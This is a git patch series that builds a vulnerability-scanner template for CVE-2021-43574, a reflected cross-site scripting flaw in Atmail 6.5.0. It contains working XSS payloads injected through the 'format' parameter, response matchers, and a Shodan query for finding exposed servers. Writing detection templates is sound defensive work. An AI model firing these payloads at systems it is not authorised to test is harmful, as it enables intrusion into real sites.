From 3f072e5f2e9c759d51aba1bf8f0dee718dda0dec Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:46:54 +0530
Subject: [PATCH 1/3] Create CVE-2021-43574.yaml

---
 cves/2021/CVE-2021-43574.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2021/CVE-2021-43574.yaml

diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
new file mode 100644
index 0000000000..ff24496a8a
--- /dev/null
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-43574
+
+info:
+  name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574
+    - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+  metadata:
+    shodan-query: http.html:"Powered by Atmail"
+    verified: true
+  tags: xss,cve,2021
+
+requests:
+  - raw:
+      - |
+        GET /atmail/?format="><script>alert(document.cookie)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        words:
+          - '<script>alert(document.cookie)</script>'

From fe8ce97ceb18ab46d5dc6c3853399d007ff24585 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 1 Sep 2022 11:54:02 +0530
Subject: [PATCH 2/3] Update CVE-2021-43574.yaml

---
 cves/2021/CVE-2021-43574.yaml | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
index ff24496a8a..746617c5d9 100644
--- a/cves/2021/CVE-2021-43574.yaml
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -19,6 +19,14 @@ requests:
       - |
         GET /atmail/?format="><script>alert(document.cookie)</script> HTTP/1.1
         Host: {{Hostname}}
+        
+      - |
+        GET /atmail/webmail/?format="><script>alert(document.cookie)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /?format="><script>alert(document.cookie)</script> HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:

From 99702fea47d023f266bc8bf574f7db8e944de0ab Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 1 Sep 2022 12:04:48 +0530
Subject: [PATCH 3/3] Update CVE-2021-43574.yaml

---
 cves/2021/CVE-2021-43574.yaml | 46 +++++++++++++++++++----------------
 1 file changed, 25 insertions(+), 21 deletions(-)

diff --git a/cves/2021/CVE-2021-43574.yaml b/cves/2021/CVE-2021-43574.yaml
index 746617c5d9..e6fcbe06b9 100644
--- a/cves/2021/CVE-2021-43574.yaml
+++ b/cves/2021/CVE-2021-43574.yaml
@@ -1,39 +1,43 @@
 id: CVE-2021-43574
 
 info:
-  name: Atmail Hosting Webserver 6.5.0 - Reflected Cross-site scripting
-  author: arafatansari
+  name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
+  author: arafatansari,ritikchaddha
   severity: medium
   description: |
     Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43574
     - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43574
+  classification:
+    cve-id: CVE-2021-43574
   metadata:
-    shodan-query: http.html:"Powered by Atmail"
     verified: true
-  tags: xss,cve,2021
+    shodan-query: http.html:"Powered by Atmail"
+  tags: cve,cve2021,atmail,xss
 
 requests:
-  - raw:
-      - |
-        GET /atmail/?format="><script>alert(document.cookie)</script> HTTP/1.1
-        Host: {{Hostname}}
-        
-      - |
-        GET /atmail/webmail/?format="><script>alert(document.cookie)</script> HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        GET /?format="><script>alert(document.cookie)</script> HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>" does not exist'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 500
-
-      - type: word
-        words:
-          - '<script>alert(document.cookie)</script>'
+          - 403
+        condition: or